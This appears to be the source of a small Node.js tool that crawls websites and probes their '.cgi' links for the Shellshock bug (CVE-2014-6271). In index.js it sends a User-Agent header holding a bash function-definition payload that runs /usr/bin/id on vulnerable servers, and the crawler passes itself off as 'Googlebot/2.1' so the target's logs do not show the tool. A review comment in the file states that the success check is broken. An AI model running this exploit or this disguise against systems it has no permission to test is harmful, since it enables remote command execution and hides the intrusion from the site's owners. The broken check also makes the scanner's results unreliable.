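├── cli.js
├── package.json
└── index.js

/cli.js:
--------------------------------------------------------------------------------
#!/usr/bin/env node

// Command-line entry point: every positional argument is treated as a start
// URL and handed to the crawler exported by ./index.
var scanner = require('./index');
var argv = require('minimist')(process.argv.slice(2));

// minimist collects positional arguments in argv._; without at least one
// there is nothing to crawl.
if (!argv._.length) {
  console.log('Please provide a url');
  process.exit(1);
}

scanner(argv._);

--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
{
  "name": "CVE-2014-6271",
  "version": "0.1.0",
  "description": "CVE-2014-6271 scanner",
  "main": "index.js",
  "bin": {
    "cve6271": "cli.js"
  },
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "async": "^0.9.0",
    "crawler": "^0.2.7",
    "htmlparser": "^1.7.7",
    "minimist": "^1.1.0",
    "request": "^2.44.0",
    "soupselect": "^0.2.0"
  }
}

--------------------------------------------------------------------------------
/index.js:
--------------------------------------------------------------------------------
var util = require('util');
var parseUrl = require('url').parse;
var request = require('request');
var async = require('async');
var select = require('soupselect').select;
var htmlparser = require("htmlparser");

var Crawler = require("crawler").Crawler;


// Hostnames taken from the start URLs the operator supplied. The crawler only
// follows, and the probe queue only receives, links on these hosts, so a page
// that links to a third-party site does not pull that site into the scan.
var allowedHosts = Object.create(null);

/**
 * Lower-cased hostname of an absolute URL.
 *
 * @param {*} link - candidate URL; anything that is not a string yields null
 * @returns {string|null} hostname, or null when the value has none
 */
function hostOf(link) {
  if (typeof link !== 'string') {
    return null;
  }
  var host = parseUrl(link).hostname;
  return host ? host.toLowerCase() : null;
}

/**
 * True when the link points at a host that was registered through
 * allowSeeds().
 *
 * @param {*} link - absolute URL found on a crawled page
 * @returns {boolean}
 */
function inScope(link) {
  var host = hostOf(link);
  return host !== null && allowedHosts[host] === true;
}

/**
 * Register the hosts of the start URLs as the scan scope.
 *
 * @param {string|Object|Array} urls - one start URL, a crawler option object
 *   carrying `uri`, or an array of either (cli.js passes an array)
 */
function allowSeeds(urls) {
  [].concat(urls).forEach(function(seed) {
    var link = typeof seed === 'string' ? seed : (seed && seed.uri);
    var host = hostOf(link);
    if (host) {
      allowedHosts[host] = true;
    } else {
      // No parsable hostname (for example a missing scheme): nothing is
      // added to the scope, so links found via this seed are not followed.
      console.log('no host in start url', seed);
    }
  });
}


/**
 * Probe queue, at most five requests in flight. Each task sends one GET whose
 * User-Agent header carries a bash function definition followed by an echo of
 * `marker` and the output of /usr/bin/id (the CVE-2014-6271 check), then looks
 * for the marker pattern in the response body and logs 'vuln <link>' on a
 * match.
 *
 * On the receiving side the probe can be recognised wherever the User-Agent
 * is logged: the header value starts with "() {".
 *
 * NOTE(review): util.format() is given one argument for two %s placeholders,
 * and the response check expects only digits between two copies of the
 * marker. As written the check does not line up with the header that is
 * sent, so the absence of a 'vuln' line is not evidence that a host is
 * patched.
 */
var s = async.queue(function(link, cb) {
  console.log('scanner', link);
  var marker = 'my-cve6271-test';
  request({
    url: link,
    timeout: 3000,
    headers: {
      'Referrer': "http://www.google.com.hk/",
      'User-Agent': util.format("() { :;};echo %s$(/usr/bin/id)%s", marker)
    }
  }, function(err, res, body) {
    if (err) {
      // Timeouts and connection failures are reported instead of being
      // dropped, so an unreachable URL is not mistaken for a clean one.
      console.log('error', link, err.message);
      return cb();
    }
    var reg = new RegExp(marker + '\\d+' + marker);
    if (reg.test(body)) {
      console.log('vuln', link);
    }
    // The worker has to signal completion; otherwise the queue stops
    // handing out work once five tasks have started.
    cb();
  });
}, 5);


/**
 * Crawler that walks the pages of the registered hosts. For every <a> element
 * on a fetched page, links containing ".cgi" are pushed to the probe queue
 * and every in-scope link is queued for further crawling.
 *
 * The crawler sends 'Googlebot/2.1' as its User-Agent, so the crawl shows up
 * under that string in the target's access logs rather than under the name of
 * this tool.
 */
var c = new Crawler({
  maxConnections: 5,
  userAgent: 'Googlebot/2.1',
  timeout: 50000,
  callback: function(error, result, $) {
    if (error) {
      console.log('error', error);
      return;
    }

    // $ is a jQuery instance scoped to the server-side DOM of the page
    $("a").each(function(index, a) {
      try {
        // Stay on the hosts the operator named; links to other hosts are
        // neither crawled nor probed.
        if (!inScope(a.href)) {
          return;
        }

        if (/\.cgi/.test(a.href)) {
          s.push(a.href);
        }

        c.queue(a.href);
      } catch (e) {
        console.error(e);
      }
    });
  }
});

/**
 * Start crawling from one or more URLs. The hosts of these URLs become the
 * scan scope.
 *
 * @param {string|Array} url - start URL or array of start URLs
 */
module.exports = function(url) {
  console.log('enqueue', url);
  allowSeeds(url);
  c.queue(url);
};

/**
 * Probe a single URL directly, without crawling.
 *
 * @param {string} url - URL to send the probe request to
 */
module.exports.scan = function(url) {
  s.push(url);
};



--------------------------------------------------------------------------------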